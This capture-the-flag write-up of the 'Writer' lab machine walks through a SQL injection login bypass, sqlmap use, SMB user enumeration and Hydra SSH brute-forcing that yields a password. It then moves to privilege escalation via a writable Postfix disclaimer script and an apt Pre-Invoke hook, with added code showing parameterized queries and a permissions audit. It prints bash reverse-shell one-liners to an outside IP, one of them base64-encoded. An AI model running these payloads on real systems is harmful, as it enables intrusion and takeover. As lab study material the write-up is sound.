Engagement flow
Summary
This was a cool but confusing lab. I found myself trying many different paths and constantly unsure of what to do next. We started off with some SQL injection that allowed us to collect files off the backend host. However, I initially found nothing helpful but the web server code. This Python code allegedly had a vulnerability in it, but instead I worked with RPC enumeration over SMB for a username and then SSH bruteforcing with Hydra, which provided an initial foothold. From here we pivoted and elevated our privileges to a more advanced user via excessive group privileges on an email Postfix disclaimer tool. We were able to add custom code to the disclaimer script, which executes to tag every outgoing email with a disclaimer.
Finally we pivoted to root, where we targeted the cron jobs and again found excessive permissions on apt.conf.d. From here we followed a known exploit from GTFOBins to inject OS commands into the apt update process due to improper input handling.
Processes/Techniques
SQL injection
RPC enumeration
SSH bruteforcing
Cron job manipulation
Postfix disclaimer injection
GTFOBins
References
Tools used
Dirbuster
Burp Suite
Burp repeater
Linpeas
Hydra
SQLmap
Enum4linux
Enumeration
└─$ nmap 10.129.176.17
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-14 12:58 EST
Nmap scan report for 10.129.176.17
Host is up (0.083s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
In depth scan
└─$ nmap 10.129.176.17 -sC -sV
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-14 13:00 EST
Nmap scan report for 10.129.176.17
Host is up (0.078s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 98:20:b9:d0:52:1f:4e:10:3a:4a:93:7e:50:bc:b8:7d (RSA)
| 256 10:04:79:7a:29:74:db:28:f9:ff:af:68:df:f1:3f:34 (ECDSA)
|_ 256 77:c4:86:9a:9f:33:4f:da:71:20:2c:e1:51:10:7e:8d (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Story Bank | Writer.HTB
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: WRITER, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-01-14T18:00:24
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.04 seconds
Web Enumeration
We jump into web enumeration and have a pretty simple site with nothing interactive. We add writer.htb to our hosts file and it does not resolve any differently.
Running Dirbuster provides an interesting directory to enumerate.
Dirbuster: /administrative/
SQL login bypass
Browsing to the web page provides a simple login form we are able to bypass with basic SQL injection payloads.
1 or 1=1-- -
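Why a payload like this works, shown as an added example (my code, not the box's application or any code from this writeup): a login query built by string formatting next to the parameterized form. It uses an in-memory SQLite table as a stand-in for the MySQL users table, and assumes the query quotes the username, so the injected string carries a leading quote.

```python
import sqlite3


def make_db():
    # Constructed stand-in for the application's users table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return conn


def vulnerable_login(conn, uname, password):
    # String formatting places user text inside the SQL grammar.
    # "' or 1=1-- -" closes the quoted value, makes the WHERE clause
    # true for every row, and comments out the password comparison.
    sql = ("SELECT username FROM users WHERE username = '%s' "
           "AND password = '%s'" % (uname, password))
    return conn.execute(sql).fetchone() is not None


def safe_login(conn, uname, password):
    # Placeholders pass the values to the driver separately; the quote
    # and the comment marker are compared as literal characters and are
    # never parsed as SQL, so the same payload simply matches nothing.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (uname, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    payload = "admin' or 1=1-- -"
    print("string-built query:", vulnerable_login(db, payload, "wrong"))  # True
    print("parameterized query:", safe_login(db, payload, "wrong"))      # False
```

Parameterization closes the bypass but not the file read shown later: that depends on the application's database account holding the FILE privilege, which a least-privilege DB user would not have.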
sqlmap on the vulnerable login form
Having exploited the page, we can investigate further by catching the request with Burp and saving it for automated testing with sqlmap.
I used sqlmap at a basic level on our saved request with the command below. We learn that the back-end DB is running MySQL.
sqlmap -r login
We take this further and call the --os-shell function, which is a lazy way to capitalize on an already automated tool, but we have no success.
└─$ sqlmap -r login -D MYSQL --os-shell
[20:40:31] [INFO] parsing HTTP request from 'login'
[20:40:31] [INFO] resuming back-end DBMS 'mysql'
[20:40:31] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=admin' AND (SELECT 2214 FROM (SELECT(SLEEP(5)))mXhp) AND 'iGix'='iGix&password=admin
---
[20:40:31] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 19.10 or 20.04 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:40:31] [INFO] going to use a web backdoor for command prompt
[20:40:31] [INFO] fingerprinting the back-end DBMS operating system
[20:40:34] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> whoami
[20:40:37] [WARNING] invalid value, only digits are allowed
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] Y
[20:40:45] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs, /usr/local/var/www') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 1
[20:40:53] [WARNING] unable to automatically parse any web server path
[20:40:53] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[20:40:53] [WARNING] unable to upload the file stager on '/var/www/'
[20:40:53] [INFO] trying to upload the file stager on '/var/www/administrative/' via LIMIT 'LINES TERMINATED BY' method
[20:40:54] [WARNING] unable to upload the file stager on '/var/www/administrative/'
[20:40:54] [INFO] trying to upload the file stager on '/var/www/html/' via LIMIT 'LINES TERMINATED BY' method
[20:40:54] [WARNING] unable to upload the file stager on '/var/www/html/'
[20:40:54] [INFO] trying to upload the file stager on '/var/www/html/administrative/' via LIMIT 'LINES TERMINATED BY' method
[20:40:55] [WARNING] unable to upload the file stager on '/var/www/html/administrative/'
[20:40:55] [INFO] trying to upload the file stager on '/var/www/htdocs/' via LIMIT 'LINES TERMINATED BY' method
[20:40:56] [WARNING] unable to upload the file stager on '/var/www/htdocs/'
[20:40:56] [INFO] trying to upload the file stager on '/var/www/htdocs/administrative/' via LIMIT 'LINES TERMINATED BY' method
[20:40:56] [WARNING] unable to upload the file stager on '/var/www/htdocs/administrative/'
[20:40:56] [INFO] trying to upload the file stager on '/usr/local/apache2/htdocs/' via LIMIT 'LINES TERMINATED BY' method
[20:40:57] [WARNING] unable to upload the file stager on '/usr/local/apache2/htdocs/'
[20:40:57] [INFO] trying to upload the file stager on '/usr/local/apache2/htdocs/administrative/' via LIMIT 'LINES TERMINATED BY' method
[20:40:58] [WARNING] unable to upload the file stager on '/usr/local/apache2/htdocs/administrative/'
[20:40:58] [INFO] trying to upload the file stager on '/usr/local/www/data/' via LIMIT 'LINES TERMINATED BY' method
[20:40:58] [WARNING] unable to upload the file stager on '/usr/local/www/data/'
[20:40:58] [INFO] trying to upload the file stager on '/usr/local/www/data/administrative/' via LIMIT 'LINES TERMINATED BY' method
[20:40:59] [WARNING] unable to upload the file stager on '/usr/local/www/data/administrative/'
[20:40:59] [INFO] trying to upload the file stager on '/var/apache2/htdocs/' via LIMIT 'LINES TERMINATED BY' method
[20:41:00] [WARNING] unable to upload the file stager on '/var/apache2/htdocs/'
[20:41:00] [INFO] trying to upload the file stager on '/var/apache2/htdocs/administrative/' via LIMIT 'LINES TERMINATED BY' method
[20:41:00] [WARNING] unable to upload the file stager on '/var/apache2/htdocs/administrative/'
[20:41:00] [INFO] trying to upload the file stager on '/var/www/nginx-default/' via LIMIT 'LINES TERMINATED BY' method
[20:41:01] [WARNING] unable to upload the file stager on '/var/www/nginx-default/'
[20:41:01] [INFO] trying to upload the file stager on '/var/www/nginx-default/administrative/' via LIMIT 'LINES TERMINATED BY' method
[20:41:02] [WARNING] unable to upload the file stager on '/var/www/nginx-default/administrative/'
[20:41:02] [INFO] trying to upload the file stager on '/srv/www/htdocs/' via LIMIT 'LINES TERMINATED BY' method
[20:41:02] [WARNING] unable to upload the file stager on '/srv/www/htdocs/'
[20:41:02] [INFO] trying to upload the file stager on '/srv/www/htdocs/administrative/' via LIMIT 'LINES TERMINATED BY' method
[20:41:03] [WARNING] unable to upload the file stager on '/srv/www/htdocs/administrative/'
[20:41:03] [INFO] trying to upload the file stager on '/usr/local/var/www/' via LIMIT 'LINES TERMINATED BY' method
[20:41:04] [WARNING] unable to upload the file stager on '/usr/local/var/www/'
[20:41:04] [INFO] trying to upload the file stager on '/usr/local/var/www/administrative/' via LIMIT 'LINES TERMINATED BY' method
[20:41:05] [WARNING] unable to upload the file stager on '/usr/local/var/www/administrative/'
[20:41:05] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times, 404 (Not Found) - 85 times
[20:41:05] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/writer.htb'
[*] ending @ 20:41:05 /2022-01-14/
So we try all the available flags, and the privileges flag shows the database user holds the FILE privilege, i.e. it has permissions over files on the host. We could use sqlmap to download these files, which I did, but I could not spot the vulnerability in the Python code.
sqlmap -r login --privilege
[13:01:29] [INFO] fetching database users privileges
[13:01:29] [INFO] fetching database users
[13:01:29] [INFO] fetching number of database users
[13:01:29] [INFO] retrieved: 1
[13:01:35] [INFO] retrieved:
[13:01:40] [INFO] adjusting time delay to 2 seconds due to good response times
'admin'@'localhost'
[13:04:05] [INFO] fetching number of privileges for user 'admin'
[13:04:05] [INFO] retrieved: 1
[13:04:08] [INFO] fetching privileges for user 'admin'
[13:04:08] [INFO] retrieved: FILE
database management system users privileges:
[*] %admin% [1]:
privilege: FILE
[13:04:33] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.129.176.255'
[*] ending @ 13:04:33 /2022-01-16/
RPC client enumeration
We find a username with RPC enumeration.
└─$ rpcclient -U '' -N writer.htb
rpcclient $> srvinfo
WRITER Wk Sv PrQ Unx NT SNT writer server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03
rpcclient $> enumdomusers
user:[kyle] rid:[0x3e8]
rpcclient $>
SSH Bruteforce with Hydra
We take our username, select rockyou.txt and get started.
kyle:marcoantonio
Privilege escalation
So we arrive as user Kyle and need to escalate our privileges.
Looking at the group information we see that we are a part of the filter group, so we dive in to learn what that gets us access to.
Attempting to view the files that the group "filter" had access to produced a ton of errors!
So I appended 2>/dev/null to suppress the errors in the terminal.
Having learned we have special permissions on disclaimer, we check out the files within.
List all files and check permissions
What is Postfix?
Postfix is a popular open-source Mail Transfer Agent (MTA) that can be used to route and deliver email on a Linux system. It is estimated that around 25% of public mail servers on the internet run Postfix.
Checking local ports we can confirm port 25 is listening, which is the SMTP port responsible for mail services.
Examine master.cf
workflow
add rev shell
Check if mail server is running
connect to mail server with netcat
ehlo
mail from: kyle@writer.htb
RCPT TO: root@writer.htb
DATA
subject: boom mail
booooom
#!/bin/sh
bash -c 'bash -i >& /dev/tcp/10.10.14.123/6363 0>&1'
Establish persistence
Download John's SSH key and boom, we have persistence.
We start our enumeration by looking at group info.
This leads us down to a GTFOBins-related exploit, which can be read about further at this link.
We tailor a payload that does not initially work; however, a base64-encoded version passes successfully.
/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.123/5353 0>&1"
L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTIzLzUzNTMgMD4mMSI=
echo 'apt::Update::Pre-Invoke {"L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTIzLzUzNTMgMD4mMSI= | base64 -d | bash"};'
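The root step depends on two conditions: a file under apt.conf.d that a non-root group can write, and apt honouring a Pre-Invoke hook that runs as root. This added audit (my code, not the box's or the writeup's) checks a directory for both; the directory path is a parameter and the sample files are constructed so it runs offline.

```python
import os
import re
import stat
import tempfile

# apt config keys are case-insensitive; these hooks run as root during apt runs.
HOOK_RE = re.compile(r"(?:Pre|Post)-Invoke(?:-Success)?", re.IGNORECASE)
WRITE_BITS = stat.S_IWGRP | stat.S_IWOTH


def audit_apt_confd(confd_dir):
    """Return (path, finding) pairs for writable entries and command hooks."""
    findings = []
    # A writable directory lets anyone drop a brand-new hook file.
    if os.stat(confd_dir).st_mode & WRITE_BITS:
        findings.append((confd_dir, "directory writable by group/other"))
    for name in sorted(os.listdir(confd_dir)):
        path = os.path.join(confd_dir, name)
        if not os.path.isfile(path):
            continue
        if os.stat(path).st_mode & WRITE_BITS:
            findings.append((path, "file writable by group/other"))
        with open(path, errors="replace") as fh:
            for lineno, line in enumerate(fh, 1):
                # Hooks are legitimate in some packages; flag them for review,
                # and treat a hook in a writable file as the real problem.
                if HOOK_RE.search(line):
                    findings.append((path, "line %d defines a command hook: %s"
                                     % (lineno, line.strip())))
    return findings


def build_sample_confd():
    """Constructed test data: one harmless file and one group-writable hook file."""
    d = tempfile.mkdtemp(prefix="apt-confd-sample-")
    clean = os.path.join(d, "01-clean")
    hook = os.path.join(d, "99-hook")
    with open(clean, "w") as fh:
        fh.write('APT::Get::Assume-Yes "false";\n')
    with open(hook, "w") as fh:
        fh.write('apt::Update::Pre-Invoke {"/usr/bin/true"};\n')
    os.chmod(clean, 0o644)
    os.chmod(hook, 0o664)  # the excessive group permission from the writeup
    return d, clean, hook


if __name__ == "__main__":
    real = "/etc/apt/apt.conf.d"
    target = real if os.path.isdir(real) else build_sample_confd()[0]
    for path, msg in audit_apt_confd(target):
        print("%s: %s" % (path, msg))
```

The permission checks are generic, so the same function pointed at the Postfix disclaimer script's directory catches the group-writable condition behind the earlier pivot; only the hook regex is apt-specific.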